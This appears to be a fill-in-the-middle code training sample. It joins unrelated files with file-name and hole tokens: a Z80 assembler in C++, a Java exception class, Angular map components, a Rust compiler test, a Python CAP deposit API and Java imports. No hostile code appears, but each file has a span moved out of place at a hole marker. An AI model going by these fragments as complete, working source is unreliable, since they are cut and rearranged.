_z80_assembler::evaluate_preprocessor_label(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
z80_token tok;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_LABEL) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EXPECTING_LABEL,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
if(m_label_map.find(tok.text()) != m_label_map.end()) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(Z80_ASSEMBLER_EXCEPTION_DUPLICATE_LABEL,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
m_label_map.insert(std::pair<std::string, uint16_t>(tok.text(), origin));
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
void
_z80_assembler::evaluate_preprocessor_statement(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
z80_token tok;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
if(!statement.empty()) {
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_STATEMENT) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_MALFORMED_STATEMENT,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
tok = z80_parser::acquire_token(statement, ++offset, token_factory,
node_factory);
switch(tok.type()) {
case TOKEN_CODE:
evaluate_preprocessor_command(statement, offset, origin,
token_factory, node_factory,
exit_condition);
break;
case TOKEN_DIRECTIVE:
evaluate_preprocessor_directive(statement, offset, origin,
token_factory, node_factory,
z80_lexer_base::base_path(),
exit_condition);
break;
case TOKEN_LABEL:
evaluate_preprocessor_label(statement, offset, origin,
token_factory, node_factory,
exit_condition);
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_STATEMENT,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
void
_z80_assembler::evaluate_preprocessor_statement_list(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
z80_token tok;
z80_node_child_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_STATEMENT_LIST) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_STATEMENT_LIST,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
for(iter = node.children().begin(); iter != node.children().end(); ++iter) {
evaluate_preprocessor_statement(statement, *iter, origin, token_factory,
node_factory, exit_condition);
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
void
_z80_assembler::evaluate_statement(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
z80_token tok;
TRACE_ENTRY();
	SERIALIZE_CALL_RECUR(m_lock);

	if(!token_factory || !node_factory) {
		THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
	}

	if(!statement.empty()) {
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_STATEMENT) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_MALFORMED_STATEMENT,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
tok = z80_parser::acquire_token(statement, ++offset, token_factory,
node_factory);
switch(tok.type()) {
case TOKEN_CODE:
evaluate_command(statement, offset, origin, token_factory,
node_factory, exit_condition);
break;
case TOKEN_DIRECTIVE:
evaluate_directive(statement, offset, origin, token_factory,
node_factory, z80_lexer_base::base_path(),
exit_condition);
break;
case TOKEN_LABEL:
break;
default:
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_INVALID_STATEMENT,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
void
_z80_assembler::evaluate_statement_list(
__in const z80_stmt_t &statement,
__inout size_t &offset,
__inout uint16_t &origin,
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory,
__inout bool &exit_condition
)
{
z80_token tok;
z80_node_child_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
tok = z80_parser::acquire_token(statement, offset, token_factory,
node_factory);
if(tok.type() != TOKEN_STATEMENT_LIST) {
THROW_Z80_ASSEMBLER_EXCEPTION_CONTEXT_MESSAGE(
Z80_ASSEMBLER_EXCEPTION_EXPECTING_STATEMENT_LIST,
tok, true, "%s", CHECK_STR(tok.to_string()));
}
z80_node node = z80_parser::acquire_node(statement, offset, node_factory);
for(iter = node.children().begin(); iter != node.children().end(); ++iter) {
evaluate_statement(statement, *iter, origin, token_factory,
node_factory, exit_condition);
}
TRACE_EXIT("Return Value: off: %lu, org: 0x%04x, exit: 0x%x", offset, origin, exit_condition);
}
z80_lst_t
_z80_assembler::identifier(void)
{
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
TRACE_EXIT("Return Value: 0x%x", 0);
return m_identifier_map;
}
z80_lst_t
_z80_assembler::label(void)
{
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
TRACE_EXIT("Return Value: 0x%x", 0);
return m_label_map;
}
std::string
_z80_assembler::listing(void)
{
z80_lst_t::iterator iter;
std::stringstream result;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
for(iter = m_identifier_map.begin(); iter != m_identifier_map.end();
++iter) {
result << iter->first << LISTING_SYMBOL_SEPERATOR << LISTING_TYPE_IDENTIFIER
<< LISTING_SYMBOL_SEPERATOR << iter->second << std::endl;
}
for(iter = m_label_map.begin(); iter != m_label_map.end(); ++iter) {
result << iter->first << LISTING_SYMBOL_SEPERATOR << LISTING_TYPE_LABEL
<< LISTING_SYMBOL_SEPERATOR << iter->second << std::endl;
}
TRACE_EXIT("Return Value: %s", CHECK_STR(result.str()));
return result.str();
}
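// second pass: walk the statement stream and emit the binary, using
// the label addresses collected by the preprocessor pass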
void
_z80_assembler::run_assembler(
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory
)
{
size_t offset;
z80_stmt_t stmt;
bool exit_condition = false;
uint16_t origin = ORIGIN_INIT;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
m_binary.clear();
m_identifier_map.clear();
z80_parser::reset();
if(statement() == statement_begin()) {
stmt = move_next_statement();
} else {
stmt = statement();
}
while(has_next_statement()) {
offset = 0;
if(stmt.empty()) {
THROW_Z80_ASSEMBLER_EXCEPTION_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EMPTY_STATEMENT,
"pos: %lu", z80_parser::position());
}
evaluate_statement(stmt, offset, origin, token_factory, node_factory,
exit_condition);
if(exit_condition) {
break;
}
stmt = move_next_statement();
}
TRACE_EXIT("Return Value: 0x%x", 0);
}
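// first pass: walk the statement stream to expand includes and
// collect label addresses without emitting bytes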
void
_z80_assembler::run_preprocessor(
__in z80_token_factory_ptr token_factory,
__in z80_node_factory_ptr node_factory
)
{
size_t offset;
z80_stmt_t stmt;
bool exit_condition = false;
uint16_t origin = ORIGIN_INIT;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
if(!token_factory || !node_factory) {
THROW_Z80_ASSEMBLER_EXCEPTION(Z80_ASSEMBLER_EXCEPTION_INTERNAL_EXCEPTION);
}
z80_parser::reset();
if(statement() == statement_begin()) {
stmt = move_next_statement();
} else {
stmt = statement();
}
while(has_next_statement()) {
offset = 0;
if(stmt.empty()) {
THROW_Z80_ASSEMBLER_EXCEPTION_MESSAGE(Z80_ASSEMBLER_EXCEPTION_EMPTY_STATEMENT,
"pos: %lu", z80_parser::position());
}
evaluate_preprocessor_statement(stmt, offset, origin, token_factory,
node_factory, exit_condition);
if(exit_condition) {
break;
}
stmt = move_next_statement();
}
TRACE_EXIT("Return Value: 0x%x", 0);
}
void
_z80_assembler::set(
__in const std::string &input,
__in_opt bool is_file
)
{
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
z80_assembler::clear();
z80_parser::set(input, is_file);
TRACE_EXIT("Return Value: 0x%x", 0);
}
size_t
_z80_assembler::size(void)
{
size_t result;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
result = m_binary.size();
TRACE_EXIT("Return Value: %lu", result);
return result;
}
std::string
_z80_assembler::to_string(
__in_opt bool verbose
)
{
std::stringstream result;
z80_lst_t::iterator iter;
TRACE_ENTRY();
SERIALIZE_CALL_RECUR(m_lock);
result << binary_as_string(m_binary, verbose);
if(!m_binary.empty()) {
result << std::endl;
}
result << "Identifier[" << m_identifier_map.size() << "]";
if(verbose) {
for(iter = m_identifier_map.begin(); iter != m_identifier_map.end();
++iter) {
result << std::endl << "--- [" << VALUE_AS_HEX(uint16_t, iter->second)
<< "] " << iter->first;
}
}
result << std::endl << "Label[" << m_label_map.size() << "]";
if(verbose) {
for(iter = m_label_map.begin(); iter != m_label_map.end();
++iter) {
result << std::endl << "--- [" << VALUE_AS_HEX(uint16_t, iter->second)
<< "] " << iter->first;
}
}
TRACE_EXIT("Return Value: %s", CHECK_STR(result.str()));
return result.str();
}
}
}<|fim▁end|> | TRACE_ENTRY(); |
<|file_name|>StudyURNFormatException.java<|end_file_name|><|fim▁begin|>package gov.va.med.imaging.exceptions;
public class StudyURNFormatException
extends URNFormatException<|fim▁hole|> {
super();
}
public StudyURNFormatException(String message)
{
super(message);
}
public StudyURNFormatException(Throwable cause)
{
super(cause);
}
public StudyURNFormatException(String message, Throwable cause)
{
super(message, cause);
}
}<|fim▁end|> | {
private static final long serialVersionUID = 6271193731031546478L;
public StudyURNFormatException() |
<|file_name|>mousewheelzoom.component.ts<|end_file_name|><|fim▁begin|>import { Component, Input, OnDestroy, OnInit } from '@angular/core';
import { interaction } from 'openlayers';
import { MapComponent } from '../map.component';<|fim▁hole|>})
export class MouseWheelZoomInteractionComponent implements OnInit, OnDestroy {
instance: interaction.MouseWheelZoom;
@Input() duration: number;
@Input() timeout: number;
@Input() useAnchor: boolean;
constructor(private map: MapComponent) {
}
ngOnInit() {
this.instance = new interaction.MouseWheelZoom(this);
this.map.instance.addInteraction(this.instance);
}
ngOnDestroy() {
this.map.instance.removeInteraction(this.instance);
}
}<|fim▁end|> |
@Component({
selector: 'aol-interaction-mousewheelzoom',
template: '' |
<|file_name|>app.component.ts<|end_file_name|><|fim▁begin|>/*
* Angular 2 decorators and services
*/
import {
Component,
OnInit,
ViewEncapsulation,
ChangeDetectionStrategy
} from '@angular/core';
import {
Event,
NavigationStart,
Router
} from '@angular/router';
import {
Store
} from '@ngrx/store';
import {
UserInfo
} from './common/entities';
/*
* App Component
* Top Level Component
*/
@Component({
selector: 'app',
encapsulation: ViewEncapsulation.None,
styles: [
require('./styles/vendors.scss'),
require('./styles/index.scss'),
require('./app.styles.scss')
],
templateUrl: './app.template.html',
changeDetection: ChangeDetectionStrategy.OnPush
})
export class AppComponent {
private isAuth: boolean;
constructor(
private router: Router,
private store: Store<UserInfo>
) {
this.store.select('auth').subscribe((res: UserInfo) => {
this.isAuth = res.isAuth;
});
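    // redirect unauthenticated users to the login page on navigation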
router.events
.filter((event: Event) => event instanceof NavigationStart)
.subscribe((event: NavigationStart) => {
if (!this.isAuth && event.url !== '/login') {
this.router.navigate(['login']);<|fim▁hole|> });
}
}<|fim▁end|> | } |
<|file_name|>no-use.rs<|end_file_name|><|fim▁begin|>// check that reservation impls can't be used as normal impls in positive reasoning.
#![feature(rustc_attrs)]<|fim▁hole|>
fn main() {
<() as MyTrait>::foo(&());
//~^ ERROR the trait bound `(): MyTrait` is not satisfied
}<|fim▁end|> |
trait MyTrait { fn foo(&self); }
#[rustc_reservation_impl = "foo"]
impl MyTrait for () { fn foo(&self) {} } |
<|file_name|>api.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
# This file is part of CERN Analysis Preservation Framework.
# Copyright (C) 2016 CERN.
#
# CERN Analysis Preservation Framework is free software; you can redistribute
# it and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# CERN Analysis Preservation Framework is distributed in the hope that it will
# be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with CERN Analysis Preservation Framework; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Deposit API."""
from __future__ import absolute_import, print_function
import copy
import shutil
import tempfile
from copy import deepcopy
from functools import wraps
import requests
from celery import shared_task
from flask import current_app, request
from flask_login import current_user
from invenio_access.models import ActionRoles, ActionUsers
from invenio_db import db
from invenio_deposit.api import Deposit, index, preserve
from invenio_deposit.utils import mark_as_action
from invenio_files_rest.errors import MultipartMissingParts
from invenio_files_rest.models import Bucket, FileInstance, ObjectVersion
from invenio_jsonschemas.errors import JSONSchemaNotFound
from invenio_records.models import RecordMetadata
from invenio_records_files.models import RecordsBuckets
from invenio_rest.errors import FieldError
from jsonschema.validators import Draft4Validator, RefResolutionError
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import NoResultFound
from werkzeug.local import LocalProxy
from cap.config import FILES_URL_MAX_SIZE
from cap.modules.records.api import CAPRecord
from cap.modules.repoimporter.repo_importer import RepoImporter
from cap.modules.schemas.models import Schema
from cap.modules.user.errors import DoesNotExistInLDAP
from cap.modules.user.utils import (get_existing_or_register_role,
get_existing_or_register_user)
from .errors import (DepositValidationError, FileUploadError,
UpdateDepositPermissionsError)
from .fetchers import cap_deposit_fetcher
from .minters import cap_deposit_minter
from .permissions import (AdminDepositPermission, CloneDepositPermission,
DepositAdminActionNeed, DepositReadActionNeed,
DepositUpdateActionNeed, UpdateDepositPermission)
_datastore = LocalProxy(lambda: current_app.extensions['security'].datastore)
current_jsonschemas = LocalProxy(
lambda: current_app.extensions['invenio-jsonschemas']
)
PRESERVE_FIELDS = (
'_deposit',
'_buckets',
'_files',
'_experiment',
'_access',
'general_title',
'$schema'
)
DEPOSIT_ACTIONS = [
'deposit-read',
'deposit-update',
'deposit-admin',
]
def DEPOSIT_ACTIONS_NEEDS(id):
"""Method to construct action needs."""
return {
'deposit-read': DepositReadActionNeed(str(id)),
'deposit-update': DepositUpdateActionNeed(str(id)),
'deposit-admin': DepositAdminActionNeed(str(id))
}
EMPTY_ACCESS_OBJECT = {
action: {'users': [], 'roles': []} for action in DEPOSIT_ACTIONS
}
class CAPDeposit(Deposit):
"""Define API for changing deposit state."""
deposit_fetcher = staticmethod(cap_deposit_fetcher)
deposit_minter = staticmethod(cap_deposit_minter)
published_record_class = CAPRecord
@property
def schema(self):
"""Schema property."""
return Schema.get_by_fullpath(self['$schema'])
@property
def record_schema(self):
"""Convert deposit schema to a valid record schema."""
record_schema = self.schema.get_matching_record_schema()
return record_schema.fullpath
def pop_from_data(method, fields=None):
"""Remove fields from deposit data.
        :param fields: List of fields to remove (default: internal
            deposit fields such as ``_deposit``, ``_access`` and ``$schema``).
"""
fields = fields or (
'_deposit',
'_access',
'_experiment',
'general_title',
'$schema'
)
@wraps(method)
def wrapper(self, *args, **kwargs):
"""Check current deposit status."""
for field in fields:
if field in args[0]:
args[0].pop(field)
return method(self, *args, **kwargs)
return wrapper
def pop_from_data_patch(method, fields=None):
"""Remove fields from deposit data.
        :param fields: List of JSON-pointer paths to remove (default:
            internal deposit fields such as ``/_deposit`` and ``/$schema``).
"""
fields = fields or (
'/_deposit',
'/_access',
'/_files',
'/_experiment',
'/$schema',
)
@wraps(method)
def wrapper(self, *args, **kwargs):
"""Check current deposit status."""
for field in fields:
for k, patch in enumerate(args[0]):
if field == patch.get("path", None):
del args[0][k]
return method(self, *args, **kwargs)
return wrapper
@mark_as_action
def permissions(self, pid=None):
"""Permissions action.
We expect an array of objects:
[{
"email": "",
"type": "user|egroup",
"op": "add|remove",
"action": "deposit-read|deposit-update|deposit-admin"
}]
"""
with AdminDepositPermission(self).require(403):
data = request.get_json()
return self.edit_permissions(data)
@mark_as_action
def publish(self, *args, **kwargs):
"""Simple file check before publishing."""
with AdminDepositPermission(self).require(403):
for file_ in self.files:
if file_.data['checksum'] is None:
raise MultipartMissingParts()
return super(CAPDeposit, self).publish(*args, **kwargs)
@mark_as_action
def upload(self, pid=None, *args, **kwargs):
"""Upload action for file/repository."""
with UpdateDepositPermission(self).require(403):
data = request.get_json()
fileinfo = self._construct_fileinfo(data['url'],
data['type'])
if request:
_, record = request.view_args.get('pid_value').data
record_id = str(record.id)
filename = fileinfo['filename']
obj = ObjectVersion.create(
bucket=record.files.bucket, key=filename
)
obj.file = FileInstance.create()
record.files.flush()
record.files[filename]['source_url'] = data['url']
if data['type'] == 'url':
if data['url'].startswith(
('https://github',
'https://gitlab.cern.ch',
'root://')):
download_url.delay(record_id, data['url'], fileinfo)
else:
raise FileUploadError(
'Please provide a valid file url.')
else:
if data['url'].startswith(
('https://github', 'https://gitlab.cern.ch')):
download_repo.delay(record_id, data['url'], filename)
else:
raise FileUploadError(
'Please provide a valid repository url.')
return self
@index
@mark_as_action
def clone(self, pid=None, id_=None):
"""Clone a deposit.
Adds snapshot of the files when deposit is cloned.
"""
with CloneDepositPermission(self).require(403):
data = copy.deepcopy(self.dumps())
del data['_deposit'], data['control_number']
deposit = super(CAPDeposit, self).create(data, id_=id_)
deposit['_deposit']['cloned_from'] = {
'type': pid.pid_type,
'value': pid.pid_value,
'revision_id': self.revision_id,
}
bucket = self.files.bucket.snapshot()
RecordsBuckets.create(record=deposit.model, bucket=bucket)
# optionally we might need to do: deposit.files.flush()
deposit.commit()
return deposit
@mark_as_action
def edit(self, *args, **kwargs):
"""Edit deposit."""
with UpdateDepositPermission(self).require(403):
return super(CAPDeposit, self).edit(*args, **kwargs)
@pop_from_data
def update(self, *args, **kwargs):
"""Update deposit."""
with UpdateDepositPermission(self).require(403):
super(CAPDeposit, self).update(*args, **kwargs)
@pop_from_data_patch
def patch(self, *args, **kwargs):
"""Patch deposit."""
with UpdateDepositPermission(self).require(403):
return super(CAPDeposit, self).patch(*args, **kwargs)
def edit_permissions(self, data):
"""Edit deposit permissions.
We expect an array of objects:
[{
"email": "",
"type": "user|egroup",
"op": "add|remove",
"action": "deposit-read|deposit-update|deposit-admin"
}]
"""
with db.session.begin_nested():
for obj in data:
if obj['type'] == 'user':
try:
user = get_existing_or_register_user(obj['email'])
except DoesNotExistInLDAP:
raise UpdateDepositPermissionsError(
'User with this mail does not exist in LDAP.')
if obj['op'] == 'add':
try:
self._add_user_permissions(user,
[obj['action']],
db.session)
except IntegrityError:
raise UpdateDepositPermissionsError(
'Permission already exist.')
elif obj['op'] == 'remove':
try:
self._remove_user_permissions(user,
[obj['action']],
db.session)
except NoResultFound:
raise UpdateDepositPermissionsError(
'Permission does not exist.')
elif obj['type'] == 'egroup':
try:
role = get_existing_or_register_role(obj['email'])
except DoesNotExistInLDAP:
raise UpdateDepositPermissionsError(
'Egroup with this mail does not exist in LDAP.')
if obj['op'] == 'add':
try:
self._add_egroup_permissions(role,
[obj['action']],
db.session)
except IntegrityError:
raise UpdateDepositPermissionsError(
'Permission already exist.')
elif obj['op'] == 'remove':
try:
self._remove_egroup_permissions(role,
[obj['action']],
db.session)
except NoResultFound:
raise UpdateDepositPermissionsError(
'Permission does not exist.')
self.commit()
return self
@preserve(result=False, fields=PRESERVE_FIELDS)
def clear(self, *args, **kwargs):
"""Clear only drafts."""
super(CAPDeposit, self).clear(*args, **kwargs)
def is_published(self):
"""Check if deposit is published."""
return self['_deposit'].get('pid') is not None
def get_record_metadata(self):
"""Get Record Metadata instance for deposit."""
return RecordMetadata.query.filter_by(id=self.id).one_or_none()
def commit(self, *args, **kwargs):
"""Synchronize files before commit."""
self.files.flush()
return super(CAPDeposit, self).commit(*args, **kwargs)
def _add_user_permissions(self,
user,
permissions,
session):
"""Adds permissions for user for this deposit."""
for permission in permissions:
session.add(
ActionUsers.allow(
DEPOSIT_ACTIONS_NEEDS(self.id)[permission],
user=user
)
)
session.flush()
self['_access'][permission]['users'].append(user.id)
def _remove_user_permissions(self,
user,
permissions,
session):
"""Remove permissions for user for this deposit."""
for permission in permissions:
session.delete(
ActionUsers.query.filter(
ActionUsers.action == permission,
ActionUsers.argument == str(self.id),
ActionUsers.user_id == user.id
).one()
)
session.flush()
self['_access'][permission]['users'].remove(user.id)
def _add_egroup_permissions(self,
egroup,
permissions,
session):
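        """Grant the given deposit permissions to an e-group."""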
for permission in permissions:
session.add(
ActionRoles.allow(
DEPOSIT_ACTIONS_NEEDS(self.id)[permission],
role=egroup
)
)
session.flush()
self['_access'][permission]['roles'].append(egroup.id)
def _remove_egroup_permissions(self,
egroup,
permissions,
session):
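        """Revoke the given deposit permissions from an e-group."""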
for permission in permissions:
session.delete(
ActionRoles.query.filter(
ActionRoles.action == permission,
ActionRoles.argument == str(self.id),
ActionRoles.role_id == egroup.id
).one()
)
session.flush()
self['_access'][permission]['roles'].remove(egroup.id)
def _init_owner_permissions(self, owner=current_user):
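        """Initialize the access object and grant all actions to the owner."""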
self['_access'] = deepcopy(EMPTY_ACCESS_OBJECT)
if owner:
with db.session.begin_nested():
self._add_user_permissions(owner,
DEPOSIT_ACTIONS,
db.session)
self['_deposit']['created_by'] = owner.id
self['_deposit']['owners'] = [owner.id]
def _construct_fileinfo(self, url, type):
"""Construct repo name or file name."""
url = url.rstrip('/')
branch = None
if type == 'repo':
filename = filepath = url.split('/')[-1] + '.tar.gz'
else:
url = url.split('/blob/')[-1]
info = url.split('/')
branch = info[0]
filename = info[-1]
filepath = '/'.join(info[1:])
return {'filepath': filepath, 'filename': filename, 'branch': branch}
def _set_experiment(self):
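        """Set the experiment field from the deposit schema."""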
schema = Schema.get_by_fullpath(self['$schema'])
self['_experiment'] = schema.experiment
def _create_buckets(self):
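        """Create a bucket and attach it to the deposit record."""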
bucket = Bucket.create()
RecordsBuckets.create(record=self.model, bucket=bucket)
def validate(self, **kwargs):
"""Validate data using schema with ``JSONResolver``."""
# def _concat_deque(queue):
# """Helper for joining dequeue object."""
# result = ''
# for i in queue:
# if isinstance(i, int):
# result += '[' + str(i) + ']'
# else:
# result += '/' + i
# return result
result = {}
try:
schema = self['$schema']
if not isinstance(schema, dict):
schema = {'$ref': schema}
resolver = current_app.extensions[
'invenio-records'].ref_resolver_cls.from_schema(schema)
result['errors'] = [
FieldError(list(error.path), str(error.message))
for error in
Draft4Validator(schema, resolver=resolver).iter_errors(self)
]
if result['errors']:
raise DepositValidationError(None, errors=result['errors'])
except RefResolutionError:
raise DepositValidationError('Schema with given url not found.')
except KeyError:
raise DepositValidationError('Schema field is required.')
@classmethod
def get_record(cls, id_, with_deleted=False):
"""Get record instance."""
deposit = super(CAPDeposit, cls).get_record(
id_=id_, with_deleted=with_deleted)
deposit['_files'] = deposit.files.dumps()
return deposit
@classmethod
def create(cls, data, id_=None, owner=current_user):
"""Create a deposit.
Adds bucket creation immediately on deposit creation.
"""
data = cls._preprocess_data(data)
cls._validate_data(data)
deposit = super(CAPDeposit, cls).create(data, id_=id_)
deposit._create_buckets()
deposit._set_experiment()
deposit._init_owner_permissions(owner)
deposit.commit()
return deposit
@classmethod
def _preprocess_data(cls, data):
# data can be sent without specifying particular version of schema,
# but just with a type, e.g. cms-analysis
# this be resolved to the last version of deposit schema of this type
if '$ana_type' in data:
try:
schema = Schema.get_latest(
'deposits/records/{}'.format(data['$ana_type'])
)
except JSONSchemaNotFound:
raise DepositValidationError(
'Schema {} is not a valid deposit schema.'
.format(data['$ana_type']))
data['$schema'] = schema.fullpath
data.pop('$ana_type')
return data
@classmethod
def _validate_data(cls, data):
if not isinstance(data, dict) or data == {}:
raise DepositValidationError('Empty deposit data.')
try:
schema_fullpath = data['$schema']
except KeyError:
raise DepositValidationError('Schema not specified.')
try:
Schema.get_by_fullpath(schema_fullpath)
except (AttributeError, JSONSchemaNotFound):
raise DepositValidationError('Schema {} is not a valid option.'
.format(schema_fullpath))
@shared_task(max_retries=5)
def download_url(pid, url, fileinfo):
"""Task for fetching external files/repos."""
record = CAPDeposit.get_record(pid)
    size = None
    # extract the file info up front; `filename` is needed by the final
    # commit in both the xrootd and the repository branch below
    filepath = fileinfo.get('filepath', None)
    filename = fileinfo.get('filename', None)
    branch = fileinfo.get('branch', None)
    if url.startswith("root://"):
        from xrootdpyfs.xrdfile import XRootDPyFile
        response = XRootDPyFile(url, mode='r-')
        total = response.size
    else:
        try:
file = RepoImporter.create(url, branch).archive_file(filepath)
url = file.get('url', None)
size = file.get('size', None)
token = file.get('token', None)
headers = {'PRIVATE-TOKEN': token}
response = requests.get(
url, stream=True, headers=headers).raw
response.decode_content = True
total = size or int(
response.headers.get('Content-Length'))
except TypeError as exc:
download_url.retry(exc=exc, countdown=10)
task_commit(record, response, filename, total)
@shared_task(max_retries=5)
def download_repo(pid, url, filename):
"""Task for fetching external files/repos."""
record = CAPDeposit.get_record(pid)
try:
link = RepoImporter.create(url).archive_repository()
response = ensure_content_length(link)
total = int(response.headers.get('Content-Length'))
except TypeError as exc:<|fim▁hole|> download_repo.retry(exc=exc, countdown=10)
task_commit(record, response.raw, filename, total)
def task_commit(record, response, filename, total):
"""Commit file to the record."""
record.files[filename].file.set_contents(
response,
default_location=record.files.bucket.location.uri,
size=total
)
db.session.commit()
def ensure_content_length(
url, method='GET',
session=None,
max_size=FILES_URL_MAX_SIZE or 2**20,
*args, **kwargs):
"""Add Content-Length when no present."""
kwargs['stream'] = True
session = session or requests.Session()
r = session.request(method, url, *args, **kwargs)
if 'Content-Length' not in r.headers:
# stream content into a temporary file so we can get the real size
spool = tempfile.SpooledTemporaryFile(max_size)
shutil.copyfileobj(r.raw, spool)
r.headers['Content-Length'] = str(spool.tell())
spool.seek(0)
# replace the original socket with our temporary file
r.raw._fp.close()
r.raw._fp = spool
return r<|fim▁end|> | |
<|file_name|>ViewPrivacyModels.java<|end_file_name|><|fim▁begin|>/*
* ARX: Powerful Data Anonymization
* Copyright 2012 - 2021 Fabian Prasser and contributors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.deidentifier.arx.gui.view.impl.define;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
import org.deidentifier.arx.gui.Controller;
import org.deidentifier.arx.gui.model.Model;
import org.deidentifier.arx.gui.model.ModelCriterion;
import org.deidentifier.arx.gui.model.ModelEvent;
import org.deidentifier.arx.gui.model.ModelEvent.ModelPart;
import org.deidentifier.arx.gui.model.ModelBLikenessCriterion;
import org.deidentifier.arx.gui.model.ModelDDisclosurePrivacyCriterion;
import org.deidentifier.arx.gui.model.ModelExplicitCriterion;
import org.deidentifier.arx.gui.model.ModelLDiversityCriterion;
import org.deidentifier.arx.gui.model.ModelRiskBasedCriterion;
import org.deidentifier.arx.gui.model.ModelTClosenessCriterion;
import org.deidentifier.arx.gui.resources.Resources;
import org.deidentifier.arx.gui.view.SWTUtil;
import org.deidentifier.arx.gui.view.def.IView;
import org.deidentifier.arx.gui.view.impl.common.ClipboardHandlerTable;
import org.eclipse.swt.SWT;
import org.eclipse.swt.events.SelectionAdapter;
import org.eclipse.swt.events.SelectionEvent;
import org.eclipse.swt.graphics.Image;
import org.eclipse.swt.layout.GridData;
